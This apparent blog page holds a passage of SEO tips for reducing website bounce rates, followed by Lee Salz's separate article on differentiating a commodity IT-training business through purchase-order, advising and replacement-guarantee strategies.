Clickbait is commonplace now. In fact, it’s hard to find a news publisher’s site without this kind of garbage following articles.

[Image: promoted clickbait links beneath an article]

If you’re foolish enough to click one of these links you’ll find yourself on some of the worst sites on the web, full of pop-ups, pagination and lots of attempts to trick you into clicking on ads. There’s also the question of why publishers would want to send their audiences there, but that’s an issue for another article.

Essentially, none of these posts are likely to deliver on the promise of the headline. The content needs to be relevant to the headline, or else people will bounce quickly.

I’m not against lists or using headlines to attract clicks, which is why this article has the headline it does. It’s just that headlines have to deliver on their promises.

4. Avoid huge pop-ups and annoying ads

Serving users with a huge pop-up as soon as they enter the site is a great way to make them hit the back button.

Likewise, intrusive rollover ads and autoplay audio are what make web users turn to adblockers. It will make many others bounce as soon as they reach your site.

5. Use internal linking

I’ve written about the use of internal linking as an SEO tactic, but it performs an important role in keeping people on site for longer.

Providing users with links to other interesting articles which are relevant to the one which users are reading increases the likelihood that they’ll hang around for longer, and reduces those bounce rates.

6. Be careful with external links

I’m all for giving credit where it’s due when it comes to links, but if you add external links early in a post and don’t open them in a new window, you’re essentially inviting users to leave your site and inflating your bounce rates.
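
A minimal example of the markup (the URL is a placeholder): opening the reference in a new tab, with rel="noopener" so the opened page can’t script the one that linked to it:

<a href="https://example.com/source-article" target="_blank" rel="noopener">source article</a>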

7. Do not use pagination

This could actually be posited as a way to reduce bounce rates, but I think the drawback of annoying users outweighs this particular aim.

People can scroll, so there’s no need to paginate. The only reason I can think of is to falsely inflate page views.

[Image: paginated article on The New York Times]

8. Site design

Users will form an opinion of your site the minute they land on it, and much of this is down to the design.

Your search result or tweet may have convinced them to click, but bad design (or at least design that doesn’t appeal to the visitor) can convince them to leave.

For example, an ecommerce site should convey a certain level of professionalism if you’re asking users to trust you with their credit card details.

This site may sell the very best gates and fences, but the design doesn’t exactly convey professionalism. It’s also very hard to read.

[Image: gates and fences website with hard-to-read design]

(Hat tip to Branded3 for the example.)

9. Article formatting

This is very important. Just as people make quick judgements based on site design, they’ll also look at the article or page they clicked on and wonder how much work it will be to read and consume.

A wall of text with few paragraphs and no visual stimulus will deter many people just because it seems like hard work to digest.

[Image: a wall of text with few paragraph breaks]

On the other hand, if you have clear sub-headings, bullet points, images and charts, and bold text on key stats and points then it makes even longer articles seem more appealing.

Of course, the content should deliver, but first impressions matter in this respect.

10. Mobile-friendly pages

An obvious point. If you want mobile users to stay a while on your site, then make sure it’s mobile-optimized.

11. Site search and navigation

Site search provides an easy navigation option for visitors.

On ecommerce sites, site search users often convert at higher than the average rate, as using it can indicate a greater intent to purchase.

On other sites, search provides users with an alternative way to navigate through sites, one that some web users prefer.

Give people easy and clear ways to navigate around your site. Make navigation intuitive and consistent.

12. Related content recommendations

This is about giving people ideas for other content or pages based on the article they’re reading.

We use them here on SEW, based on the main topic. You’ll see it down the page, between the author bio and the comments.

This may not be the best example of content recommendation in action, but the idea of providing content relevant to the current article is a good one.

[Image: related content box on Search Engine Watch]

13. Most read/commented boxes

This is another form of content recommendation, based on the articles being read or shared. Here’s an example from the BBC:

[Image: BBC most read / most popular box]

We have something similar here, a trending posts box. You may or may not have noticed it…

The point of these is that they give users further ideas for reading, whether looking at the posts with the largest number of comments, or those with most views.

14. Make calls to action clear on landing pages

You have to make it clear where customers need to go next to buy a product, retrieve a quote, or whatever action you want them to take.

Here are some general pointers:

Wording. The wording you use should make it obvious what will happen if a user presses a button, such as ‘Add to cart’ or ‘Checkout.’
Colours. Test to see which colours work best. Contrast is key. Many sites tend to go for yellow or green, but what works for one site doesn’t necessarily work for another.
Size. Make them big enough to be seen easily, but not too big.
Placement. Buttons should be placed where users’ eyes are likely to be as they scan around the page.
Adapt for different devices. Calls to action should work across various mobile devices as well as desktop.
Test. There are no right or wrong answers here. Wording, colour, shape, placement etc can all be tested to find what produces the best results.
In summary

The tips here are a mixture of methods for persuading users to stay on your site longer, and to explore further.

The latter is key to reduce bounce rates, as they need to interact with your site, but the page they land on creates that all-important first impression.

If the first page doesn’t do its job in terms of delivering relevance to the user and avoiding obvious annoyances, then there’s little chance users will want to stick around.

Also, to repeat the earlier point: bounce rates are useful, but only when used alongside other metrics such as time on page and the proportion of visitors viewing multiple pages.

Differentiation when selling a commodity

Published by:

Imagine being tasked with building a sales force that would sell products identical to the competition’s, but at a premium price. That was the opportunity I accepted when taking on an executive sales leadership role years ago.

In the ’90s, as Microsoft, Novell and IBM/Lotus became software powerhouses, they recognized the need to train users on their products. Without that training, there was a high risk of users being dissatisfied with the products and not purchasing future upgrade releases of them. Rather than train users themselves, they developed training channels. Individual training companies contracted with these software companies and delivered training on their behalf.

However, the software companies didn’t blindly let their channels train users. They created the course curriculum, certified the instructors on the courses, and set the PC standards for the classroom. In essence, the software companies regulated the classroom experience and marketed to users that they could attend any of the thousands of “authorized” training facilities for a fantastic learning experience.

While the software companies wanted to create a “vanilla experience” for their clients, that was not the way their training channels approached the business.

Course prices were set all over the board. Salespeople told prospects that their training companies had better instructors and nicer PCs in the classrooms than their competitors, as a way to justify higher course prices. Again, the software companies wrote the curriculum, certified the instructors and provided the specifications for the PCs. How could it be better?

The software companies told clients that all of their authorized training companies were the same, like going to McDonald’s. Thus, prospects didn’t buy the better arguments. They bought low price. Why shouldn’t they? In the absence of differentiation, price is the ultimate decision factor. Yet, the task put in front of me was to build a sales force that could sell our courses at a premium price.

Next steps

While we were passionate that our training was superior, we could not prove it. The classroom was a commodity, but there was still an opportunity to differentiate ourselves and sell at higher prices.

We learned that IT managers had several challenges. First, when an IT manager needed to send an employee for a training course, he needed to get three to five signature approvals on the purchase order. It was the same repeated process for each employee for each course. It was a bureaucratic pain.

Second, there were a significant number of class attendees who, upon taking the course, realized that the course was not right for them or vice versa. This meant the training dollars were lost, as was the time the employee missed at work to take the course.

Finally, because of the demand for trained IT professionals, IT managers feared their trained employees would leave the company.

Given those three issues, we developed a sales strategy based on making it easier for IT managers to get the right training for their employees.

Key strategies

Our salespeople called on senior IT management executives rather than the mid-level managers whom most of our competitors called on. We introduced the idea of using a blanket purchase order for the entire training budget. Our training company billed against the blanket purchase order as employees enrolled in courses. Interestingly, the internal process to get one blanket purchase order for a million dollars of training was the same as for a fifteen-hundred-dollar course.

Before any employee was enrolled in a course, one of our education advisors interviewed the prospective student to make sure it was the training they needed and that they had the background to succeed in it.

Finally, we offered a replacement guarantee. If an employee we trained left his or her company within a year of completing a course, we trained the new person free of charge.

As a result of this differentiation strategy, we became the largest, most profitable training company for Microsoft, Novell and IBM/Lotus. We sold our courses at 30 to 50 percent higher prices than our competitors. Because we had the blanket purchase order for the entire training budget, our competitors were locked out of these accounts.

While our competitors argued “better,” we positioned “different.” Differentiate yourself by solving the problems your buyers face rather than trying to differentiate commodities.

Need help with differentiation? Download my free “Making Differentiators Matter” poster.

Lee Salz is a sales management strategist and best-selling author of “Hire Right, Higher Profits,” a top-rated sales and selling management book on Amazon. Salz specializes in helping companies build sales forces through effective hiring, onboarding, managing and compensating salespeople. He is the founder and CEO of Sales Architects, Business Expert Webinars, and The Revenue Accelerator. He is a speaker and a results-driven sales management consultant. Salz can be reached at 763-416-4321.